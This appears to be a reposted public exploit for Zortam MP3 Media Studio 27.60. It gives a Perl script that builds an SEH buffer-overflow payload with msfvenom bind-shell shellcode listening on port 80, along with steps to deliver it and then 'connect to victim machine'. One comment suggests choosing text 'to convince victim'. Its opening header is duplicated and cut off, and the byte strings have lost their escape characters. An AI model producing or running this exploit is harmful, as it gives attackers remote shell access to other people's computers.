Zortam MP3 Media Studio 27.60 Remote Code Execution

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 190

# Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)
# Date: November 19, 2020
# Exploit Author: Vincent Wolterman
# Vendor Homepage: https://www.zortam.com/inde # Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)
# Date: November 19, 2020
# Exploit Author: Vincent Wolterman
# Vendor Homepage: https://www.zortam.com/index.html
# Software Link: https://www.zortam.com/download.html
# Version: 27.60
# Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Professional Build 19041

# Steps to reproduce crash:
# 1) Run provided Perl code Zortam_MP3_Studio_poc.pl
# 2) Open Zortam_Crash.txt output file
# 3) Copy contents of text file to clipboard
# 4) Open Zortam Mp3 Studio
# 5) From the Menu bar -> File -> New Library
# 6) Click ‘OK’ when prompted ‘Do you want to create a new Mp3 library?’
# 7) Paste the contents of Zortam_Crash.txt into the ‘Select Folder’ field
# 8) Click 'OK'
# 9) Connect to victim machine on port 80

#!/usr/bin/perl

$baddata = "Metal's_Greatest_Hits"; # you can put whatever you need to here to convince victim (will be seen during crash)
$baddata .= "x90" x (268-length($baddata)); # exact overwrite at 272

$nseh = "xebx0bx90x90"; # nseh overwrite JMP short 11 bytes into NOP sled

# 0x10015962 : pop ecx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [WNASPI32.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.1.50
# (C:Program Filesortam Mp3 Media StudioWNASPI32.DLL)

$seh = "x62x59x01x10"; # seh overwrite
$nop = "x90" x 12; # NOP sled

# msfvenom -p windows/shell_bind_tcp LPORT=80 -b "x00x0ax0d" -f perl -v payload EXITFUNC=seh
# Payload size: 355 bytes

$payload =
"xd9xcfxbfxadx91xa4xe3xd9x74x24xf4x5ax29xc9" .
"xb1x53x83xc2x04x31x7ax13x03xd7x82x46x16xdb" .
"x4dx04xd9x23x8ex69x53xc6xbfxa9x07x83x90x19" .
"x43xc1x1cxd1x01xf1x97x97x8dxf6x10x1dxe8x39" .
"xa0x0exc8x58x22x4dx1dxbax1bx9ex50xbbx5cxc3" .
"x99xe9x35x8fx0cx1dx31xc5x8cx96x09xcbx94x4b" .
"xd9xeaxb5xdax51xb5x15xddxb6xcdx1fxc5xdbxe8" .
"xd6x7ex2fx86xe8x56x61x67x46x97x4dx9ax96xd0" .
"x6ax45xedx28x89xf8xf6xefxf3x26x72xebx54xac" .
"x24xd7x65x61xb2x9cx6axcexb0xfax6exd1x15x71" .
"x8ax5ax98x55x1ax18xbfx71x46xfaxdex20x22xad" .
"xdfx32x8dx12x7ax39x20x46xf7x60x2dxabx3ax9a" .
"xadxa3x4dxe9x9fx6cxe6x65xacxe5x20x72xd3xdf" .
"x95xecx2axe0xe5x25xe9xb4xb5x5dxd8xb4x5dx9d" .
"xe5x60xcbx95x40xdbxeex58x32x8bxaexf2xdbxc1" .
"x20x2dxfbxe9xeax46x94x17x15x68x35x91xf3x02" .
"xa5xf7xacxbax07x2cx65x5dx77x06xddxc9x30x40" .
"xdaxf6xc0x46x4cx60x4bx85x48x91x4cx80xf8xc6" .
"xdbx5ex69xa5x7ax5exa0x5dx1excdx2fx9dx69xee" .
"xe7xcax3exc0xf1x9exd2x7bxa8xbcx2ex1dx93x04" .
"xf5xdex1ax85x78x5ax39x95x44x63x05xc1x18x32" .
"xd3xbfxdexecx95x69x89x43x7cxfdx4cxa8xbfx7b" .
"x51xe5x49x63xe0x50x0cx9cxcdx34x98xe5x33xa5" .
"x67x3cxf0xdbx96x8cxedx4cx01x65x4cx11xb2x50" .
"x93x2cx31x50x6cxcbx29x11x69x97xedxcax03x88" .
"x9bxecxb0xa9x89";

$file = "Zortam_Crash.txt";
open (FILE, '>Zortam_Crash.txt');
print FILE $baddata;
print FILE $nseh;
print FILE $seh;
print FILE $nop;
print FILE $payload;
close (FILE);

print "Exploit file created [" . $file . "] ";
print "Buffer size: " . length($baddata) . " ";